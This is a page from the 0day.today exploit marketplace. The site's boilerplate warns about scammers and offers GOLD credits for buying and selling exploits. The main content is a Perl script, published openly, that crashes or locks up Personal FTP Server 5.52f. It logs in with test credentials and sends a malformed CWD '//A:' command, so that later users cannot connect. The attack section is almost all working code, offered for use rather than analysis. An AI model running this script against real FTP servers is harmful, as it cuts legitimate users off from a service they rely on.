0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Personal FTP Server 5.52f Exploit
================================= Personal FTP Server 5.52f Exploit ================================= #!/usr/bin/perl ############################################################################ # # Exploit Title: Personal FTP Server 5.52f bug # Date: 01/08/2010 # Author: TA4G - S8T@hotmail.com # Download: Personal FTP-Server PRO [deutsch] v5.52 Limitierte Shareware Version # Download: http://www.michael-roth-software.de/prosharegerman.zip # It's rather a bug then a DoS which consist in denying other users access to the ftp server, after a previous user triggered a //A: command # Version: 5.52 # Google dork : n/a # Platform / Tested on: windows 7 # Category: webapps/0day # -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= # L0v3 To: TA4G _ lOsT _ Mr-DraGon _ Kader11000 _ illusionist2512 _ TnTDc _ P4L-T3RRORIST _ Sn!p3r_P4L # -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= # -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= # Gr33tz to ### ArHack.NeT ### # -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= use Net::FTP; (($target = $ARGV[0])) || die "usage:$0 <target> <port>"; my $user = "test"; my $pass = "test"; $expl = "//A:"; $ftp = Net::FTP->new($target, Debug => 0, Port => 21) || die "Nu m-am putut conecta: $!"; $ftp->login($user,$pass) || die "Nu m-am putut loga: $!"; print "M-am logat!n"; $ftp->command("CWD", $expl); print "Lansez comanda in executie...n"; print "Incerc sa ma conectez din nou..n"; $ftp = Net::FTP->new($target, Debug => 0, Port => 21) || die "Userul 2 nu se mai poate conecta: $!"; $ftp->quit; # 0day.today [2024-12-25] #